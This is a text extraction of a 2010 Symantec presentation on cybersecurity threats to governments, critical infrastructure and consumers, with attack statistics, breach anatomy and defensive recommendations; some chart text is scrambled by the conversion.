Presentation by Symantec.

1. Dealing with security threats
A more connected world than what you think…..
Ilias Chantzos
Director EMEA & APJ Government Relations
Kenya 9 March 2010 1

2. Agenda
• A bit about Symantec and where
the information comes from
• The current threat landscape
– Threats to government and national
security/CIIP
– Threats to consumers
– Examples
• Anatomy of a security breach
• Operationalising security

3. Symantec Global Presence
Global Intelligence Network (GIN)
ATTACK ACTIVITY MALCODE INTELLIGENCE VULNERABILITIES SPAM / PHISHING
• 240,000 sensors •130M+ clients, servers, • 32,000+ vulnerabilities • 2.5M decoy accounts
• 200+ countries gateways • 11,000 vendors ‐72k techs • 8B+ emails analyzed daily
Gotheburg, Sweden
Aschheim, Germany
Reading, Green Park, GBR Wiesbaden, Germany
Calgary, Alberta, CA Ratingen, Germany
Dublin, Ireland Warsaw, Poland
Roseville, MN Shannon, Ireland
Seattle, WA Bloomfield Hills, MI Toronto, CA Zaltbommel, NLD
Springfield, OR Englewood, CO Brussels, Belgium Milan, Italy
Newton/Waltham, MA
San Francisco, CA Herndon, VA Seoul, South Korea
Oak Brook, IL Madrid, Spain Beijing, China
Mountain View, CA Alexandria, VA Tokyo, Japan
Orem, UT
Cupertino, CA Durham, NC
Dallas, TX Atlanta, Georgia Chengdu, China Shanghai, China
Santa Monica, CA
Houston, TX Heathrow, FL Riyadh, Saudi Arabia Dubai, UAE
San Luis Obispo, CA
Culver City, CA Austin Texas Miami, FL Taipei, Taiwan
Mumbai, India Hong Kong, China
Mexico City, Mexico
Pune, India
Chennai, India
Singapore
Brisbane, Aus
Sao Paola, Brazil
Sandton, South Africa Sydney, Aus
Buenos Aires, Argentina
Melbourne, Aus
4 MSS Security 11 Security Research 29 Global Support
Operations Centers Centers Centers
Government – Commercial ‐ Consumer
3

4. How Likely Is It?
To be struck by lightening? To be bitten by a snake?
1 in 2.6M 1 in 42M
To be in car accident?
? To be attacked online?
1 in 300 1 in 5
4

5. The current threat landscape
Threats to Government and CIIP
Presentation Identifier Goes Here 5

6. Malicious code is installed…
• Over 60% of all malicious code detected by Symantec discovered in 2008.
• Over 90% of threats are threats to confidential information.
6
6

7. Information is at risk
Majority of data breaches in More than half of breaches
Education (27%), followed by (57%) due to theft or loss,
Government (20%) and followed by insecure policy
Healthcare (15%) (21%)
7

8. Threat Activity Trends - Malicious Activity
• In 2008 the United States was the top country for malicious activity
(raw numbers) with 23% of the overall proportion. China was ranked
second with 9%.
• As Internet and broadband grows in certain countries their share of
malicious activity also grows.
8
8

9. Governments Are Prime Targets
Certain contact and account data were taken, including user IDs and
passwords, email addresses, names, phone numbers, and some basic
demographic data.
Data breach at federal government jobsite USAJobs.gov
Hackers breached the site, then modified it to redirect users to a
rogue URL that in turn directed attack code against their systems.
Government travel site GovTrip.gov users suffer malware attacks
Administrators … were forced to withdraw the page after it was
defaced by more than 170 people over a frenzied few hours.
Defra website using Wiki editing techniques defaced
Shortly after police confiscated the group's servers, DoS attacks
took the official government website and the Swedish national
police site offline. The attacks were assumed to be a
reprisal from disgruntled Pirate Bay users.
DoS attacks on Swedish policy and official government website
9

10. Different threat scenarios
• Collect intelligence on the infrastructure
– To attack the infrastructure
– To determine the location of valuable
information
• Collect intelligence
– Capture and extract information
– Intercept communications and ciphers
• Disable the infrastructure
– That you have already infiltrated
– Directly attack it from outside
• Collect OSINT
• Conduct Psyops
• Achieve information dominance by
communicating your own message

11. Causing problems to the navy

12. Stopping the airforce
12

13. Information leaking

14. Using COTS to collect intelligence

15. DDoS on Estonia some stats
• Attack Duration: •Peak saw traffic
• 128 Unique DDoS equivalent of 5000
Attacks: 17 attacks – Less than 1 minute clicks per second
– 115 – ICMP Floods 78 attacks – 1 minute ~ 1 hour •Attacks stopped at
16 attacks – 1 hour ~ 5 hours Midnight
– 4 – TCP SYN Floods
– 9 – Generic Traffic 8 attacks – 5 hours ~ 9 hours •Tactics shifted as
weaknesses emerged
Floods 7 attacks – 10 hours or more
Source = ArborSert •Swamped web sites
80 associated with
Government Ministries,
Banks, Newspapers &
• Daily Attack Rate: 60
Broadcasters
– 03/05/2007 = 21 40
•Emergency Services
– 04/05/2007 = 17 20 Number disabled for at
least 1 hour
– 08/05/2007 = 31 0
•Access was cut to
– 09/05/2007 = 58
07
07
07
07
07
07
07
07
07
sites outside of Estonia
20
20
20
20
20
20
20
20
20
5/
5/
5/
5/
5/
5/
5/
5/
5/
/0
/0
/0
/0
/0
/0
/0
/0
/0
– 11/05/2007 = 1 in order to keep local
03
04
05
06
07
08
09
10
11
Attack Intensity access available
Source = ArborSert
15

16. Cyber defense and shooting warfare
• Why blow something up?
– If you can use it to collect intelligence
– If you can disable it when you want
– If you can use it afterwards again
• Russian attack in Georgia
– Information‐intelligence is power
– Preceded by cyber attack
– Psychological effect/operations
– Information dominance
– Propaganda

17. Taking down the traffic grid

18. Energy supply and distribution
1999 SCADA failure in Bellingham
Washington ¼ mil gal of gasoline
18

19. Attacking the energy grid

20. Collecting OSINT

21. A Real And Present Danger
Suddenly the blue screen of death has a different meaning……..
FOOD, WATER, ENERGY
SEA, AIR, ROAD & RAIL TRAFFIC
IT & TELECOMS
FINANCE MILITARY
21

22. Current and future trends
• Hacking is for fortune not for fame
• Attackers become more sophisticated and
well invested
• Target is confidential information
• Attack techniques increase in
sophistication and stealth
– Single use malware
– Evasion techniques (web and coding)
• Increased sophistication of botnets
• Virtual worlds and social engineering
• Critical infrastructure protection
dependant on Internet Security

23. Threats to consumer…….
Presentation Identifier Goes Here 23

24. Stolen information is sold
• Credit card information (32%) and bank account credentials (19%)
continue to be the most frequently advertised items.
• The price range of credit cards remained consistent in 2008, ranging
from $0.06 to $30 per card number.
• Compromised email accounts can provide access to other confidential
information and additional resources.
24
24

25. Website compromise
• Attackers locate and compromise a high-traffic site through a vulnerability
specific to the site or in a Web application it hosts.
• Once the site is compromised, attackers modify pages so malicious content is
served to visitors.
Site-specific vulnerabilities Web application vulnerabilities
25
25

26. Vulnerability Trends
Browser plug-in vulnerabilities
• Vulnerabilities in Web browser plug-ins are frequently exploited to install
malicious software.
• Memory corruption vulnerabilities again made up the majority of the type
of vulnerabilities in browser plug-in technologies for 2008, with 272
vulnerabilities classified as such.
26
26

27. Vulnerability Trends
Unpatched vulnerabilities by vendor
• In 2008, there were 112 unpatched vulnerabilities affecting enterprise-class vendors
compared to 144 in 2007.
• Microsoft had the most, with a total of 46 unpatched vulnerabilities.
• Of the 112 unpatched enterprise vulnerabilities, 37 were low severity, 71 were medium
severity, and 4 were high severity.
27
27

28. Malicious Code Trends Types
• Trojans made up 68 percent of the volume of the top 50 malicious code
samples reported in 2008, a minor decrease from 69 percent in 2007.
• Worms increased slightly from 26% in 2007 to 29% in 2008.
• The percentage of back doors decreased from 21% to 15% in the
current period.
28
28

29. Malicious Code Trends
Propagation mechanisms
• 66% of potential malicious code infections propagated as shared executable
files, up significantly from 44% in 2007.
• Malicious code using P2P file sharing protocols declined from 17% in 2007 to
10% in 2008.
29
29

30. Spam
Country of Origin
• Over the past year, Symantec observed a 192 percent increase in
spam detected across the Internet as a whole, from 119.6 billion
messages in 2007 to 349.6 billion in 2008.
• In 2008, bot networks were responsible for the distribution of
approximately 90 percent of all spam email.
• Russia, Turkey, and Brazil experienced significant increases in spam
volume this year.
30
30

31. Spam
Categories
• Internet-related spam was the top category with 24% followed by
commercial product spam with 19%
• Financial spam relatively constant at 16%.
31
31

32. An example how to exploit a users
Phisher
Cashier
Spammer Fraud
Website
Egg Drop (+ Trojan horse)
Server
Bot -Herder
Phishing Messages
Victims

33. Anatomy of a security breach
Presentation Identifier Goes Here 33

34. Anatomy of a breach
Disruption of operations
Large-scale Defacing
DDoS attacks websites
Organized Well Meaning Malicious
Criminal Insider Insider
Malware outbreaks within Stealthy ex-filtration or unintended
protected perimeter loss of confidential data
34

35. Well‐Meaning Insider
Hacker
“Well-Meaning Insider” Breach
Sources
1. Data on servers & desktops
Desktop Firewall
2. Lost/stolen laptops, mobile devices
3. Email, Web mail, removable devices
Server
4. Third‐party data loss incidents
Employee
5. Business processes
35

36. Targeted Attacks
1 2 3 4
INCURSION DISCOVERY CAPTURE EXFILTRATION
Attacker breaks in via Map organization’s Access data on Confidential data sent to
targeted malware, systems unprotected systems hacker team in the clear,
improper credentials or wrapped in encrypted
SQL injection Automatically find Install root kits to packets or in zipped
confidential data capture network data files with passwords
36

37. Malicious Insiders
Home
Computer
IM Firewall
Malicious Insider: Four Types
Unhappy Webmail
Employee 1. White collar criminals
Email
2. Terminated employees
Mobile 3. Career builders
Device
4. Industrial spies
Unhappy
CD/DVD
Employee
USB
37

38. Operationalising security……
Presentation Identifier Goes Here 38

39. Establishing In‐depth Defense
Future government Interconnected networks
Traditional ‘Bastion’
require in-depth,
capabilities are built on security models do not
proactive & agile defense
interconnected systems effectively support such
at the periphery and the
and effective information agile, interconnected
endpoint of infrastructure
sharing networks
and information
39

40. Collecting intelligence – Real time
situation awareness
what enables the wise sovereign and
the good general to strike and
conquer, and achieve things
beyond the reach of ordinary men,
is foreknowledge
SUN TZU – on the Art of
War
40

41. Conficker/Downadup – Cumlative
Source – Conficker Working Group and Shadowserver

42. How to Stop Security Breaches
Protect
Automate review Identify threats in
information
of entitlements real time
proactively
Integrate security Prevent data Stop targeted
operations exfiltration attacks
42

43. Thank you!
Ilias_chantzos@symantec.com
Copyright © 2010 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in
the U.S. and other countries. Other names may be trademarks of their respective owners.
This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied,
are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Presentation Identifier Goes Here 43